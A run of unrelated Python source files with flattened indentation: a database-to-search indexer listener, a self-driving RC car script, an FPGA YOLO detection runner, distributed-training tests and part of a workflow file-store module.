cursor.execute("""SELECT pg_is_in_recovery();""")
recovery, = cursor.fetchone()
if not recovery:
# http://initd.org/psycopg/docs/advanced.html#asynchronous-notifications
cursor.execute("""LISTEN "contentbase.transaction";""")
cursor.execute("""LISTEN "clincoded.transaction";""") # BBB
log.debug("Listener connected")
listening = True
cursor.execute("""SELECT txid_current_snapshot();""")
snapshot, = cursor.fetchone()
timestamp = datetime.datetime.now().isoformat()
update_status(
listening=listening,
recovery=recovery,
snapshot=snapshot,
status='indexing',
timestamp=timestamp,
max_xid=max_xid,
)
try:
res = testapp.post_json('/index', {
'record': True,
'dry_run': dry_run,
'recovery': recovery,
})
except Exception as e:
timestamp = datetime.datetime.now().isoformat()
log.exception('index failed at max xid: %d', max_xid)
update_status(error={
'error': repr(e),
'max_xid': max_xid,
'timestamp': timestamp,
})
else:
timestamp = datetime.datetime.now().isoformat()
result = res.json
result['stats'] = {
k: int(v) for k, v in parse_qsl(
res.headers.get('X-Stats', ''))
}
result['timestamp'] = timestamp
update_status(last_result=result)
if result.get('indexed', 0):
update_status(result=result)
log.info(result)
update_status(
status='waiting',
timestamp=timestamp,
max_xid=max_xid,
)
# Wait on notifcation
readable, writable, err = select.select(sockets, [], sockets, timeout)
if err:
raise Exception('Socket error')
if control in readable:
command = control.recv(1)
log.debug('received command: %r', command)
if not command:
# Other end shutdown
return
if conn in readable:
conn.poll()
while conn.notifies:
notify = conn.notifies.pop()
xid = int(notify.payload)
max_xid = max(max_xid, xid)
log.debug('NOTIFY %s, %s', notify.channel, notify.payload)
finally:
connection.close()
class ErrorHandlingThread(threading.Thread):
if PY2:
@property
def _kwargs(self):
return self._Thread__kwargs
@property
def _args(self):
return self._Thread__args
@property
def _target(self):
return self._Thread__target
def run(self):
timeout = self._kwargs.get('timeout', DEFAULT_TIMEOUT)
update_status = self._kwargs['update_status']
control = self._kwargs['control']
while True:
try:
self._target(*self._args, **self._kwargs)
except (psycopg2.OperationalError, sqlalchemy.exc.OperationalError) as e:
# Handle database restart
log.exception('Database went away')
timestamp = datetime.datetime.now().isoformat()
update_status(
timestamp=timestamp,
status='sleeping',
error={'error': repr(e), 'timestamp': timestamp},
)
readable, _, _ = select.select([control], [], [], timeout)
if control in readable:
command = control.recv(1)
log.debug('received command: %r', command)
if not command:
# Other end shutdown
return
log.debug('sleeping')
time.sleep(timeout)
continue
except Exception:
# Unfortunately mod_wsgi does not restart immediately
log.exception('Exception in listener, restarting process at next request.')
os.kill(os.getpid(), signal.SIGINT)
break
def composite(loader, global_conf, **settings):
listener = None
# Register before testapp creation.
@atexit.register
def join_listener():
if listener:
log.debug('joining listening thread')
listener.join()
# Composite app is used so we can load the main app
app_name = settings.get('app', None)
app = loader.get_app(app_name, global_conf=global_conf)
username = settings.get('username', 'IMPORT')
environ = {
'HTTP_ACCEPT': 'application/json',
'REMOTE_USER': username,
}
testapp = TestApp(app, environ)
# Use sockets to integrate with select
controller, control = socket.socketpair()
timestamp = datetime.datetime.now().isoformat()
status_holder = {
'status': {
'status': 'starting listener',
'started': timestamp,
'errors': [],
'results': [],
},
}
def update_status(error=None, result=None, indexed=None, **kw):
# Setting a value in a dictionary is atomic
status = status_holder['status'].copy()
status.update(**kw)
if error is not None:
status['errors'] = [error] + status['errors'][:9]
if result is not None:
status['results'] = [result] + status['results'][:9]
status_holder['status'] = status
kwargs = {
'testapp': testapp,
'control': control,
'update_status': update_status,
}
if 'timeout' in settings:
kwargs['timeout'] = float(settings['timeout'])
listener = ErrorHandlingThread(target=run, name='listener', kwargs=kwargs)
listener.daemon = True
log.debug('starting listener')
listener.start()
# Register before testapp creation.
@atexit.register
def shutdown_listener():
log.debug('shutting down listening thread')
control # Prevent early gc
controller.shutdown(socket.SHUT_RDWR)
def status_app(environ, start_response):
status = '200 OK'
response_headers = [('Content-type', 'application/json')]
start_response(status, response_headers)
return [json.dumps(status_holder['status'])]
return status_app
def internal_app(configfile, app_name=None, username=None):
from webtest import TestApp
from pyramid import paster
app = paster.get_app(configfile, app_name)
if not username:
username = 'IMPORT'
environ = {
'HTTP_ACCEPT': 'application/json',
'REMOTE_USER': username,
}
return TestApp(app, environ)
def main():
import argparse
parser = argparse.ArgumentParser(
description="Listen for changes from postgres and index in elasticsearch",
epilog=EPILOG,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument('--app-name', help="Pyramid app name in configfile")
parser.add_argument(
'--username', '-u', default='INDEXER', help="Import username")
parser.add_argument(
'--dry-run', action='store_true', help="Don't post to ES, just print")
parser.add_argument(
'-v', '--verbose', action='store_true', help="Print debug level logging")
parser.add_argument(
'--poll-interval', type=int, default=DEFAULT_TIMEOUT,
help="Poll interval between notifications")
parser.add_argument('config_uri', help="path to configfile")
args = parser.parse_args()
logging.basicConfig()
testapp = internal_app(args.config_uri, args.app_name, args.username)
# Loading app will have configured from config file. Reconfigure here:
if args.verbose or args.dry_run:
logging.getLogger('clincoded').setLevel(logging.DEBUG)
return run(testapp, args.poll_interval, args.dry_run)
if __name__ == '__main__':
main()
|
autonomous_v9.py
|
'''
Attempt to incorporate ultrasonic sensor.
'''
import car
import cv2
import numpy as np
import os
import serial
import socket
import SocketServer
import threading
import time
from imutils.object_detection import non_max_suppression
from keras.layers import Dense, Activation
from keras.models import Sequential
import keras.models
SIGMA = 0.33
stop_classifier = cv2.CascadeClassifier('cascade_xml/stop_sign.xml')
timestr = time.strftime('%Y%m%d_%H%M%S')
# distance data measured by ultrasonic sensor
sensor_data = " "
class RCDriver(object):
def steer(self, prediction):
# FORWARD
if np.all(prediction == [ 0., 0., 1.]):
car.forward(100)
car.pause(300)
print 'Forward'
# FORWARD-LEFT
elif np.all(prediction == [ 1., 0., 0.]):
car.left(300)
car.forward_left(200)
car.left(700)
car.pause(200)
print 'Left'
# FORWARD-RIGHT
elif np.all(prediction == [ 0., 1., 0.]):
car.right(300)
car.forward_right(200)
car.right(700)
car.pause(200)
print 'Right'
def stop(self):
print '* * * STOPPING! * * *'
car.pause(5000)
rcdriver = RCDriver()
class SensorDataHandler(SocketServer.BaseRequestHandler):
data = " "
def handle(self):
global sensor_data
try:
while self.data:
self.data = self.request.recv(1024)
sensor_data = round(float(self.data), 1)
#print "{} sent:".format(self.client_address[0])
print sensor_data
finally:
print "Connection closed on thread 2"
class ObjectDetection(object):
global rcdriver
global stop_classifier
def detect(self, cascade_classifier, gray_image, image):
# STOP SIGN
stop_sign_detected = cascade_classifier.detectMultiScale(
gray_image,
scaleFactor=1.1,
minNeighbors=10,
minSize=(35, 35),
maxSize=(55, 55))
# Draw a rectangle around stop sign
for (x_pos, y_pos, width, height) in stop_sign_detected:
cv2.rectangle(image, (x_pos+5, y_pos+5), (x_pos+width-5, y_pos+height-5), (0, 0, 255), 2)
cv2.putText(image, 'STOP SIGN', (x_pos, y_pos-10), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 0, 255), 2)
# Execute the full stop
if np.any(stop_sign_detected):
rcdriver.stop()
# PEDESTRIAN
hog = cv2.HOGDescriptor()
hog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())
orig = image.copy()
# Look for predestrians in the image
(rects, weights) = hog.detectMultiScale(image, winStride=(4, 4),
padding=(8, 8), scale=1.05)
# Draw the ORIGINAL bounding boxes
for (x, y, w, h) in rects:
cv2.rectangle(orig, (x, y), (x + w, y + h), (0, 0, 255), 2)
# Apply 'non-maxima suppression' to the bounding boxes using a fairly large overlap threshold to try to maintain overlapping
# boxes that are still people
rects = np.array([[x, y, x + w, y + h] for (x, y, w, h) in rects])
pick = non_max_suppression(rects, probs=None, overlapThresh=0.65)
# Draw the FINAL bounding boxes
for (xA, yA, xB, yB) in pick:
cv2.rectangle(image, (xA, yA), (xB, yB), (0, 255, 0), 2)
cv2.putText(image, 'PEDESTRIAN', (xA, yA-10), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 255, 0), 2)
obj_detection = ObjectDetection()
class NeuralNetwork(object):
global stop_classifier
global timestr
def __init__(self, receiving=False, piVideoObject=None):
self.receiving = receiving
self.model = keras.models.load_model('nn_h5/nn.h5')
# PiVideoStream class object is now here.
self.piVideoObject = piVideoObject
self.rcdriver = RCDriver()
self.fetch()
def auto_canny(self, blurred):
# Compute the median of the single channel pixel intensities
global SIGMA
v = np.median(blurred)
# Apply automatic Canny edge detection using the computed median of the image
lower = int(max(0, (1.0 - SIGMA) * v))
upper = int(min(255, (1.0 + SIGMA) * v))
edged = cv2.Canny(blurred, lower, upper)
return edged
def preprocess(self, frame):
image_array = frame.reshape(1, 38400).astype(np.float32)
image_array = image_array / 255.
return image_array
def predict(self, image):
image_array = self.preprocess(image)
y_hat = self.model.predict(image_array)
i_max = np.argmax(y_hat)
y_hat_final = np.zeros((1,3))
np.put(y_hat_final, i_max, 1)
return y_hat_final[0], y_hat
def fetch(self):
frame = 0
while self.receiving:
# There's a chance that the Main thread can get to this point before the New thread begins streaming images.
# To account for this, we create the jpg variable but set to None, and keep checking until it actually has something.
jpg = None
while jpg is None:
jpg = self.piVideoObject.frame
gray = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.IMREAD_GRAYSCALE)
image = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.IMREAD_UNCHANGED)
# Object detection
obj_detection.detect(stop_classifier, gray, image)
# Lower half of the grayscale image
roi = gray[120:240, :]
# Apply GuassianBlur (reduces noise)
blurred = cv2.GaussianBlur(roi, (3, 3), 0)
# Apply Canny filter
auto = self.auto_canny(blurred)
# Show streaming images
cv2.imshow('Original', image)
cv2.imshow('What the model sees', auto)
# Neural network model makes prediciton
# prediction = self.model.predict(auto)
prediction, probas = self.predict(auto)
# Save frame and prediction record for debugging research
prediction_english = None
prediction_english_proba = None
proba_left, proba_right, proba_forward = probas[0]
if np.all(prediction == [ 0., 0., 1.]):
prediction_english = 'FORWARD'
prediction_english_proba = proba_forward
elif np.all(prediction == [ 1., 0., 0.]):
prediction_english = 'LEFT'
prediction_english_proba = proba_left
elif np.all(prediction == [ 0., 1., 0.]):
prediction_english = 'RIGHT'
prediction_english_proba = proba_right
# cv2.putText(gray, "Model prediction: {}".format(prediction_english), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, .45, (255, 255, 0), 1)
cv2.putText(gray, "Prediction (sig={}): {}, {:>05}".format(SIGMA, prediction_english, prediction_english_proba), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, .45, (255, 255, 0), 1)
cv2.imwrite('test_frames_temp/frame{:>05}.jpg'.format(frame), gray)
frame += 1
# Send prediction to driver to tell it how to steer
self.rcdriver.steer(prediction)
if cv2.waitKey(1) & 0xFF == ord('q'):
self.stop()
cv2.destroyAllWindows()
class PiVideoStream(object):
def __init__(self):
# self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# # self.server_socket.bind(('192.168.1.66', 8000)) # The IP address of your computer (Paul's MacBook Air). This script should run before the one on the Pi.
# self.server_socket.bind(('10.10.10.1', 8000)) # The IP address of your computer (Paul's MacBook Air). This script should run before the one on the Pi.
#
#
# print 'Listening...'
# self.server_socket.listen(0)
#
# # Accept a single connection ('rb' is 'read binary')
# self.connection = self.server_socket.accept()[0].makefile('rb')
#
# # initialize the frame and the variable used to indicate
# # if the thread should be stopped
# self.frame = None
# self.stopped = False
# self.stream_bytes = ' '
self.start()
def start(self):
# start the thread to read frames from the video stream
print 'Starting PiVideoStream thread...'
print ' \"Hold on to your butts!\" '
# Start a new thread
t = threading.Thread(target=self.update, args=())
t.daemon=True
t.start()
print '...thread running'
# Main thread diverges from the new thread and activates the neural_network
# The piVideoObject argument ('self') passes the PiVideoStream class object to NeuralNetwork.
NeuralNetwork(receiving=True, piVideoObject=self)
def update(self):
while True:
self.stream_bytes += self.connection.read(1024)
first = self.stream_bytes.find('\xff\xd8')
last = self.stream_bytes.find('\xff\xd9')
if first != -1 and last != -1:
self.frame = self.stream_bytes[first:last + 2]
self.stream_bytes = self.stream_bytes[last + 2:]
def read(self):
# return the frame most recently read
return self.frame
class ThreadServer(object):
def server_thread(host, port):
server = SocketServer.TCPServer((host, port), PiVideoStream)
server.serve_forever()
def server_thread2(host, port):
server = SocketServer.TCPServer((host, port), SensorDataHandler)
server.serve_forever()
distance_thread = threading.Thread(target=server_thread2, args=('10.10.10.1', 8002))
distance_thread.start()
video_thread = threading.Thread(target=server_thread, args=('10.10.10.1', 8000))
video_thread.start()
if __name__ == '__main__':
try:
ThreadServer()
except KeyboardInterrupt:
# Rename the folder that collected all of the test frames. Then make a new folder to collect next round of test frames.
os.rename( './test_frames_temp', './test_frames_SAVED/test_frames_{}'.format(timestr))
os.makedirs('./test_frames_temp')
print '\nTerminating...\n'
car.pause(1000)
# # Close video_stream thread.
# video_stream = PiVideoStream()
# video_stream.stop()
# video_stream.connection.close()
#
# # Close serial connection to Arduino controller.
# ser = serial.Serial(port.device, 9600)
# ser.close()
print '\nDone.\n'
|
xs_detect_vitis.py
|
# Copyright 2019 Xilinx Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import json
import logging
import multiprocessing as mp
import multiprocessing.pool as mpp
import numpy as np
import time, timeit
import os, sys
import threading
from functools import partial
import math
from vai.dpuv1.rt import xstream, xdnn_io, xdnn
from vai.dpuv1.rt.vitis.python.dpu.runner import Runner
from vai.dpuv1.utils.postproc import yolo
from yolo_utils import bias_selector, saveDetectionDarknetStyle, yolo_parser_args
from yolo_utils import draw_boxes, generate_colors
from get_mAP_darknet import calc_detector_mAP
sys.path.insert(0, os.environ["VAI_ALVEO_ROOT"] + '/examples/deployment_modes')
from mp_classify_vitis import *
logging.basicConfig(filename='xs_detect_vitis.log', filemode='w', level=logging.DEBUG)
class yoloDispatcher(Dispatcher):
@staticmethod
def _run(work):
try:
(idx, images, args) = work
chanIdx = idx % Dispatcher.nWorkers
token = pid2TokenStr()
shape = Dispatcher.inshape
image_shapes = []
for i, img in enumerate(images):
cached = Dispatcher.inBlobCache.get(img)
if cached is None:
Dispatcher.inBlob[token][i, ...], img_shape = xdnn_io.loadYoloImageBlobFromFile(img, shape[2], shape[3])
Dispatcher.inBlobCache.set(img, (Dispatcher.inBlob[token][i].copy(), img_shape))
image_shapes.append(img_shape)
else:
Dispatcher.inBlob[token][i, ...] = cached[0]
image_shapes.append(cached[1])
meta = { 'id': idx, 'from': token, 'shape': shape, 'images': images, 'image_shapes': image_shapes }
if idx % 1000 == 0:
print("Put query %d to objstore" % idx)
sys.stdout.flush()
Dispatcher.xspub[token].put_blob(chanIdx2Str(chanIdx), Dispatcher.inBlob[token], meta)
Dispatcher.xstoken[token].get_msg()
except Exception as e:
logging.error("Producer exception " + str(e))
def run(self, work):
self.pool.map_async(yoloDispatcher._run, work)
class yoloWorkerPool(WorkerPool):
def __init__(self, rundir, nWorkers, workerArgs):
self.xspub = xstream.Publisher()
self.workers = []
self.wq = mp.Queue()
for wi in range(nWorkers):
w = mp.Process(target=yoloWorkerPool.run, args=(rundir, wi, self.wq, workerArgs,))
w.start()
self.workers.append(w)
# wait for worker to be ready before starting next worker
# because the last worker overwrites the IP programming
# (Note: this assumes all workers must have the same IP instructions)
self.wq.get()
@staticmethod
def run(rundir, chanIdx, q, args):
xspub = xstream.Publisher()
xssub = xstream.Subscribe(chanIdx2Str(chanIdx))
runner = Runner(rundir)
inTensors = runner.get_input_tensors()
outTensors = runner.get_output_tensors()
q.put(1) # ready for work
fpgaBlobs = None
labels = xdnn_io.get_labels(args['labels'])
if args['yolo_version'] == 'v2': yolo_postproc = yolo.yolov2_postproc
elif args['yolo_version'] == 'v3': yolo_postproc = yolo.yolov3_postproc
else: assert args['yolo_version'] in ('v2', 'v3'), "--yolo_version should be <v2|v3>"
biases = bias_selector(args)
if(args['visualize']): colors = generate_colors(len(labels))
while True:
try:
payload = xssub.get()
if not payload:
break
(meta, buf) = payload
if fpgaBlobs == None:
# allocate buffers
fpgaBlobs = []
batchsz = meta['shape'][0] # inTensors[0].dims[0]
for io in [inTensors, outTensors]:
blobs = []
for t in io:
shape = (batchsz,) + tuple([t.dims[i] for i in range(t.ndims)][1:])
blobs.append(np.empty((shape), dtype=np.float32, order='C'))
fpgaBlobs.append(blobs)
fcOutput = np.empty((batchsz, args['outsz'],), dtype=np.float32, order='C')
fpgaInput = fpgaBlobs[0][0]
assert(tuple(meta['shape']) == fpgaInput.shape)
data = np.frombuffer(buf, dtype=np.float32).reshape(fpgaInput.shape)
np.copyto(fpgaInput, data)
jid = runner.execute_async(fpgaBlobs[0], fpgaBlobs[1])
runner.wait(jid)
boxes = yolo_postproc(fpgaBlobs[1], args, meta['image_shapes'], biases=biases)
if(not args['profile']):
for i in range(min(batchsz, len(meta['image_shapes']))):
print("Detected {} boxes in {}".format(len(boxes[i]), meta['images'][i]), flush=True)
# Save the result
if(args['results_dir']):
for i in range(min(batchsz, len(meta['image_shapes']))):
fname = meta['images'][i]
filename = os.path.splitext(os.path.basename(fname))[0]
out_file_txt = os.path.join(args['results_dir'], filename + '.txt')
print("Saving {} boxes to {}".format(len(boxes[i]), out_file_txt)); sys.stdout.flush()
saveDetectionDarknetStyle(out_file_txt, boxes[i], meta['image_shapes'][i])
if(args['visualize']):
out_file_png = os.path.join(args['results_dir'], filename + '.png')
print("Saving result to {}".format(out_file_png)); sys.stdout.flush()
draw_boxes(fname, boxes[i], labels, colors, out_file_png)
if meta['id'] % 1000 == 0:
print("Recvd query %d" % meta['id'])
sys.stdout.flush()
del data
del buf
del payload
xspub.send(meta['from'], "success")
except Exception as e:
logging.error("Worker exception " + str(e))
def main():
parser = xdnn_io.default_parser_args()
parser = yolo_parser_args(parser)
args = parser.parse_args()
args = xdnn_io.make_dict_args(args)
g_nDispatchers = args['numprepproc']
g_nWorkers = args['numworkers']
# Setup the environment
images = xdnn_io.getFilePaths(args['images'])
if(args['golden'] or args['visualize']):
assert args['labels'], "Provide --labels to compute mAP."
assert args['results_dir'], "For accuracy measurements, provide --results_dir to save the detections."
# start comms
xserver = xstream.Server()
# acquire resources
fmaster = FpgaMaster(args['vitis_rundir'])
# update batch size
inshape = list(fmaster.inshape)
if args['batch_sz'] != -1:
inshape[0] = args['batch_sz']
args['net_h'] = inshape[2]
args['net_w'] = inshape[3]
# spawn dispatchers
dispatcher = yoloDispatcher(g_nDispatchers, g_nWorkers, inshape)
# spawn workers
workers = yoloWorkerPool(args['vitis_rundir']+"_worker", g_nWorkers, args)
# send work to system
g_nQueries = int(np.ceil(len(images) / inshape[0]))
work = []
for qIdx in range(g_nQueries):
idx = qIdx * inshape[0]
workBatch = [images[(idx+i) % len(images)] for i in range(inshape[0])]
work.append((qIdx, workBatch,
(args['img_raw_scale'], args['img_mean'], args['img_input_scale'])))
startTime = timeit.default_timer()
dispatcher.run(work)
del dispatcher
t = timeit.default_timer() - startTime
print("Queries: %d, Elapsed: %.2fs, QPS: %.2f, FPS: %.2f" \
% (g_nQueries, t, g_nQueries / t, g_nQueries * inshape[0] / t))
sys.stdout.flush()
# cleanup
del workers
del fmaster
del xserver
# mAP calculation
if(args['golden']):
print()
print("Computing mAP score : ")
labels = xdnn_io.get_labels(args['labels'])
print("Class names are : {} ".format(labels))
mAP = calc_detector_mAP(args['results_dir'], args['golden'], len(labels), labels, args['prob_threshold'], args['mapiouthresh'], args['points'])
sys.stdout.flush()
if __name__ == '__main__':
main()
|
test_distributed.py
|
# -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2020 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import multiprocessing as mp
import platform
import queue
import numpy as np
import pytest
import megengine as mge
import megengine.distributed as dist
from megengine.core.ops.builtin import CollectiveComm, ParamPackConcat, ParamPackSplit
from megengine.distributed.helper import (
get_device_count_by_fork,
param_pack_concat,
param_pack_split,
)
def _assert_q_empty(q):
try:
res = q.get(timeout=1)
except Exception as e:
assert isinstance(e, queue.Empty)
else:
assert False, "queue is not empty"
def _assert_q_val(q, val):
ret = q.get()
assert ret == val
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="windows disable MGB_ENABLE_OPR_MM"
)
@pytest.mark.skipif(get_device_count_by_fork("gpu") < 2, reason="need more gpu device")
@pytest.mark.isolated_distributed
def test_init_process_group():
world_size = 2
port = dist.get_free_ports(1)[0]
server = dist.Server(port)
def worker(rank, backend):
dist.init_process_group("localhost", port, world_size, rank, rank, backend)
assert dist.is_distributed() == True
assert dist.get_rank() == rank
assert dist.get_world_size() == world_size
assert dist.get_backend() == backend
py_server_addr = dist.get_py_server_addr()
assert py_server_addr[0] == "localhost"
assert py_server_addr[1] == port
mm_server_addr = dist.get_mm_server_addr()
assert mm_server_addr[0] == "localhost"
assert mm_server_addr[1] > 0
assert isinstance(dist.get_client(), dist.Client)
def check(backend):
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank, backend))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
check("nccl")
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="windows disable MGB_ENABLE_OPR_MM"
)
@pytest.mark.skipif(get_device_count_by_fork("gpu") < 2, reason="need more gpu device")
@pytest.mark.isolated_distributed
def test_new_group():
world_size = 3
ranks = [2, 0]
port = dist.get_free_ports(1)[0]
server = dist.Server(port)
def worker(rank):
dist.init_process_group("localhost", port, world_size, rank, rank)
if rank in ranks:
group = dist.new_group(ranks)
assert group.size == 2
assert group.key == "2,0"
assert group.rank == ranks.index(rank)
assert group.comp_node == "gpu{}:2".format(rank)
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank,))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="windows disable MGB_ENABLE_OPR_MM"
)
@pytest.mark.skipif(get_device_count_by_fork("gpu") < 2, reason="need more gpu device")
@pytest.mark.isolated_distributed
def test_group_barrier():
world_size = 2
port = dist.get_free_ports(1)[0]
server = dist.Server(port)
def worker(rank, q):
dist.init_process_group("localhost", port, world_size, rank, rank)
dist.group_barrier()
if rank == 0:
dist.group_barrier()
q.put(0) # to be observed in rank 1
else:
_assert_q_empty(q) # q.put(0) is not executed in rank 0
dist.group_barrier()
_assert_q_val(q, 0) # q.put(0) executed in rank 0
Q = mp.Queue()
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank, Q))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="windows disable MGB_ENABLE_OPR_MM"
)
@pytest.mark.skipif(get_device_count_by_fork("gpu") < 2, reason="need more gpu device")
@pytest.mark.isolated_distributed
def test_synchronized():
world_size = 2
port = dist.get_free_ports(1)[0]
server = dist.Server(port)
@dist.synchronized
def func(rank, q):
q.put(rank)
def worker(rank, q):
dist.init_process_group("localhost", port, world_size, rank, rank)
dist.group_barrier()
if rank == 0:
func(0, q) # q.put(0)
q.put(2)
else:
_assert_q_val(q, 0) # func executed in rank 0
_assert_q_empty(q) # q.put(2) is not executed
func(1, q)
_assert_q_val(
q, 1
) # func in rank 1 executed earlier than q.put(2) in rank 0
_assert_q_val(q, 2) # q.put(2) executed in rank 0
Q = mp.Queue()
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank, Q))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
@pytest.mark.skipif(
platform.system() == "Darwin", reason="do not imp GPU mode at macos now"
)
@pytest.mark.skipif(
platform.system() == "Windows", reason="windows disable MGB_ENABLE_OPR_MM"
)
@pytest.mark.skipif(get_device_count_by_fork("gpu") < 2, reason="need more gpu device")
@pytest.mark.isolated_distributed
def test_user_set_get():
world_size = 2
port = dist.get_free_ports(1)[0]
server = dist.Server(port)
def worker(rank):
dist.init_process_group("localhost", port, world_size, rank, rank)
# set in race condition
dist.get_client().user_set("foo", 1)
# get in race condition
ret = dist.get_client().user_get("foo")
assert ret == 1
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank,))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
def test_oprmm_hashable():
lhs = (CollectiveComm(), ParamPackConcat(), ParamPackSplit())
rhs = (CollectiveComm(), ParamPackConcat(), ParamPackSplit())
assert lhs == rhs
assert hash(lhs) == hash(rhs)
def test_param_pack_split():
a = mge.Tensor(np.ones((10,), np.int32))
b, c = param_pack_split(a, [0, 1, 1, 10], [(1,), (3, 3)])
assert np.allclose(b.numpy(), a.numpy()[1])
assert np.allclose(c.numpy(), a.numpy()[1:].reshape(3, 3))
def test_param_pack_concat():
a = mge.Tensor(np.ones((1,), np.int32))
b = mge.Tensor(np.ones((3, 3), np.int32))
offsets_val = [0, 1, 1, 10]
offsets = mge.Tensor(offsets_val, np.int32)
c = param_pack_concat([a, b], offsets, offsets_val)
assert np.allclose(np.concatenate([a.numpy(), b.numpy().flatten()]), c.numpy())
|
fileStore.py
|
# Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function
from future import standard_library
standard_library.install_aliases()
from builtins import map
from builtins import str
from builtins import range
from builtins import object
from abc import abstractmethod, ABCMeta
from collections import namedtuple, defaultdict
from contextlib import contextmanager
from fcntl import flock, LOCK_EX, LOCK_UN
from functools import partial
from hashlib import sha1
from threading import Thread, Semaphore, Event
from future.utils import with_metaclass
from six.moves.queue import Empty, Queue
import base64
import dill
import errno
import logging
import os
import shutil
import stat
import tempfile
import time
import uuid
from toil.lib.objects import abstractclassmethod
from toil.lib.humanize import bytes2human
from toil.common import cacheDirName, getDirSizeRecursively, getFileSystemSize
from toil.lib.bioio import makePublicDir
from toil.resource import ModuleDescriptor
logger = logging.getLogger(__name__)
class DeferredFunction(namedtuple('DeferredFunction', 'function args kwargs name module')):
"""
>>> df = DeferredFunction.create(defaultdict, None, {'x':1}, y=2)
>>> df
DeferredFunction(defaultdict, ...)
>>> df.invoke() == defaultdict(None, x=1, y=2)
True
"""
@classmethod
def create(cls, function, *args, **kwargs):
"""
Capture the given callable and arguments as an instance of this class.
:param callable function: The deferred action to take in the form of a function
:param tuple args: Non-keyword arguments to the function
:param dict kwargs: Keyword arguments to the function
"""
# The general principle is to deserialize as late as possible, i.e. when the function is
# to be invoked, as that will avoid redundantly deserializing deferred functions for
# concurrently running jobs when the cache state is loaded from disk. By implication we
# should serialize as early as possible. We need to serialize the function as well as its
# arguments.
return cls(*list(map(dill.dumps, (function, args, kwargs))),
name=function.__name__,
module=ModuleDescriptor.forModule(function.__module__).globalize())
def invoke(self):
"""
Invoke the captured function with the captured arguments.
"""
logger.debug('Running deferred function %s.', self)
self.module.makeLoadable()
function, args, kwargs = list(map(dill.loads, (self.function, self.args, self.kwargs)))
return function(*args, **kwargs)
def __str__(self):
return '%s(%s, ...)' % (self.__class__.__name__, self.name)
__repr__ = __str__
class FileStore(with_metaclass(ABCMeta, object)):
"""
An abstract base class to represent the interface between a worker and the job store. Concrete
subclasses will be used to manage temporary files, read and write files from the job store and
log messages, passed as argument to the :meth:`toil.job.Job.run` method.
"""
# Variables used for syncing reads/writes
_pendingFileWritesLock = Semaphore()
_pendingFileWrites = set()
_terminateEvent = Event() # Used to signify crashes in threads
def __init__(self, jobStore, jobGraph, localTempDir, inputBlockFn):
self.jobStore = jobStore
self.jobGraph = jobGraph
self.localTempDir = os.path.abspath(localTempDir)
self.workFlowDir = os.path.dirname(self.localTempDir)
self.jobName = self.jobGraph.command.split()[1]
self.inputBlockFn = inputBlockFn
self.loggingMessages = []
self.filesToDelete = set()
self.jobsToDelete = set()
@staticmethod
def createFileStore(jobStore, jobGraph, localTempDir, inputBlockFn, caching):
fileStoreCls = CachingFileStore if caching else NonCachingFileStore
return fileStoreCls(jobStore, jobGraph, localTempDir, inputBlockFn)
@abstractmethod
@contextmanager
def open(self, job):
"""
The context manager used to conduct tasks prior-to, and after a job has been run.
:param toil.job.Job job: The job instance of the toil job to run.
"""
raise NotImplementedError()
# Functions related to temp files and directories
def getLocalTempDir(self):
"""
Get a new local temporary directory in which to write files that persist for the duration of
the job.
:return: The absolute path to a new local temporary directory. This directory will exist
for the duration of the job only, and is guaranteed to be deleted once the job
terminates, removing all files it contains recursively.
:rtype: str
"""
return os.path.abspath(tempfile.mkdtemp(prefix="t", dir=self.localTempDir))
def getLocalTempFile(self):
"""
Get a new local temporary file that will persist for the duration of the job.
:return: The absolute path to a local temporary file. This file will exist for the
duration of the job only, and is guaranteed to be deleted once the job terminates.
:rtype: str
"""
